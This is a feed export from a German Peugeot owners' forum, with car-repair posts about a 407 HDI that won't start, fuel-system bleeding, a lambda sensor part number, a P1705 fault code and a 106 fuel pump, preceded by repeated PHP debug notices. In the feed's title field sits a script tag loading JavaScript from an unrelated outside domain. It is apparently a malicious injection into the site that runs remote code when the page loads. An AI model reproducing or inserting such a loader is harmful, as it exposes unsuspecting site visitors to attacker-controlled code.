[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
www.peugeotforum.de<script src="https://new2sportnews.com/peugeotforum.js"></script> ...die Informationsplattform für Peugeotfahrer 2023-01-28T04:46:30+01:00 https://peugeotforum.net/forum/app.php/feed 2023-01-28T04:46:30+01:00 2023-01-28T04:46:30+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133008&p=896478#p896478 <![CDATA[Allgemeines Forum • Re: Peugeot 407 1.6 HDI 110 OBDII!]]> Statistik: Verfasst von Mike75 — Sa 28.01.23 04:46


]]>
2023-01-27T22:33:24+01:00 2023-01-27T22:33:24+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133006&p=896477#p896477 <![CDATA[Allgemeines Forum • Re: Peugeot 407 SW 1.6 HDI springt nicht mehr an!]]>
P ist für Bremssystem!
Handbremse: Leuchtet bei
angezogener Hand- oder
Feststellbremse oder bei
aktivierter elektronischer
Parkbremse rot.

Statistik: Verfasst von Experte — Fr 27.01.23 22:33


]]>
2023-01-27T22:24:09+01:00 2023-01-27T22:24:09+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133006&p=896476#p896476 <![CDATA[Allgemeines Forum • Re: Peugeot 407 SW 1.6 HDI springt nicht mehr an!]]> hm dieselfilter versulzt oder Verdreckt oder Vorglühkerzen o Sicherung! wäre möglich. ein rotes R gibt es so nicht, höchstens beim Automatikgetriebe, für Rückwärtsgang eingeschaltet, aber das ist glaube ich Orange! der meinst du ein rotes P !?
Vielleicht auch das! Könnte sein das du Luft im Filter hast!

Leer gefahrener Tank (Diesel)
Für weitere Informationen zur Sicherung
gegen Falschtanken (Diesel), siehe
entsprechende Rubrik.
Motor 1.6 HDi
(außer BlueHDi-Version)
F Tanken Sie mindestens 5 Liter Dieselkraftstoff.
F Öffnen Sie die Motorhaube.
F Lösen und entfernen Sie bei Bedarf die
Abdeckung, um an die Entlüftungspumpe zu
gelangen.
F Betätigen Sie die Entlüftungspumpe, bis ein
Widerstand zu spüren ist (die Pumpe kann beim
ersten Druck schwergängig sein).
F Betätigen Sie den Anlasser, um den Motor zu
starten (sollte der Motor beim ersten Versuch
nicht anspringen, warten Sie etwa 15 Sekunden
und starten Sie dann erneut).
F Betätigen Sie nach mehreren erfolglosen
Versuchen die Entlüftungspumpe erneut und
danach den Anlasser.
F Setzen Sie die Abdeckung wieder auf und lassen
Sie sie einrasten.
F Schließen Sie die Motorhaube wieder.

Gruß

Statistik: Verfasst von Experte — Fr 27.01.23 22:24


]]>
2023-01-27T20:54:13+01:00 2023-01-27T20:54:13+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133008&p=896475#p896475 <![CDATA[Allgemeines Forum • Re: Peugeot 407 1.6 HDI 110 OBDII!]]> Teile Nr.: 1618LS

Statistik: Verfasst von Emma65 — Fr 27.01.23 20:54


]]>
2023-01-27T18:28:56+01:00 2023-01-27T18:28:56+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133008&p=896474#p896474 <![CDATA[Allgemeines Forum • Re: Peugeot 407 1.6 HDI 110 OBDII!]]> Weiß jemand vielleicht die Teilenummer der betroffenen Lambdasonde?
Vielen Dank im Voraus.

Statistik: Verfasst von Mike75 — Fr 27.01.23 18:28


]]>
2023-01-27T18:26:27+01:00 2023-01-27T18:26:27+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133005&p=896473#p896473 <![CDATA[Allgemeines Forum • Re: Halbautomatik Anzeige springt]]> Statistik: Verfasst von Emma65 — Fr 27.01.23 18:26


]]>
2023-01-27T13:49:23+01:00 2023-01-27T13:49:23+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133005&p=896472#p896472 <![CDATA[Allgemeines Forum • Re: Halbautomatik Anzeige springt]]> KOER = Key on / Engine Running
Sind 2 unterschiedliche Abfragebedingungen.
Bleibt die Ursache zu klären, ich würde mal auf einen Kupferwurm tippen, wenn in beiden Modi der selbe Fehler auftritt.
Da ist es sicher besser zu warten, bis einer, der bei nem Freundlichen arbeitet, sich zu Wort meldet.

Gruss

Obelix

Statistik: Verfasst von obelix — Fr 27.01.23 13:49


]]>
2023-01-27T13:43:41+01:00 2023-01-27T13:43:41+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133007&p=896471#p896471 <![CDATA[Allgemeines Forum • Re: Peugeot 106 II, 2001, 1,1 i, 60 PS, Benzinpumpe ohne Strom]]> Hatte den als Sport, mit 270.000 km hab ich ihn vor ein paar Jahren verkauft.
Doppelrelais hast Du auch wirklich ein identisches drin?

Statistik: Verfasst von mn4600 — Fr 27.01.23 13:43


]]>
2023-01-27T13:35:47+01:00 2023-01-27T13:35:47+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133005&p=896470#p896470 <![CDATA[Allgemeines Forum • Re: Halbautomatik Anzeige springt]]> Fehler P1705 Not in P or N During KOED/KOER.Leider kann mir niemand sagen was es Bedeutet.Hoffe auf eure Hilfe
Gruß
Rößner 58

Statistik: Verfasst von Rößner58 — Fr 27.01.23 13:35


]]>
2023-01-27T10:03:37+01:00 2023-01-27T10:03:37+01:00 https://peugeotforum.net/forum/viewtopic.php?t=133007&p=896469#p896469 <![CDATA[Allgemeines Forum • Re: Peugeot 106 II, 2001, 1,1 i, 60 PS, Benzinpumpe ohne Strom]]>
super, extraordinaire :lachkreisch: , Emma65 und mn4600, damit kann was anfangen.

Meine etwas ältere Reparaturanleitung mit Bildern hauptsächlich vom Typ 1 zeigt auch Schaltpläne, doch Du, Meister*in Emma hast offenbar genau fahrzeugspezifische; très bien, merci beaucoup.

Abgezogen hatte ich die Stecker des Steuergerätes nicht bisher, nur auf festen Sitz gepüft; haben ja so halbmondförmige Bajonettverschlüsse.

Nun, ausblinken also nicht, c´est la vie.

Meine letzte und einzige eigene Peugeot-Erfahrung zuvor war um 1995 herum für etwa 2 Jahre ein 1986er 205 mit 46 PS, der mit dem einzigen Ölkreislauf für Motor und Getriebe. Toller einfacher Wagen seinerzeit, zuverlässig, war nur mal das Schaltgestänge abgefallen und das Markieren auf hellen Flächen mit ein paar Tropfen Öl ließ er nicht bleiben. :vorkopphau:

Hat mir die Scheu vor Franzosen genommen damals :daumenhoch: . Dann wieder einige Opel und wenige VW, zuvor auch mehrere Ladas 2101 in der alten Fiat124-Form. Aktuell Skoda 120 L von 1980. Den Oldi sollte der 106er im Winter schonen. Hat er auch und wird er wieder. Und behalten wird er dann wohl auch, der Peugeot, wenn er demnächst die HU besteht - und dafür siet `s gut aus. Blech erstaunlich gut.

Morgen, übermorgen werde ich mich des kleinen sympatischen Geräts wieder annehmen; drückt mir die Daumen :daumenhoch: .

Hier ein optischer Eindruck.

Gruß Joachim

Bild

Statistik: Verfasst von xrv850 — Fr 27.01.23 10:03


]]>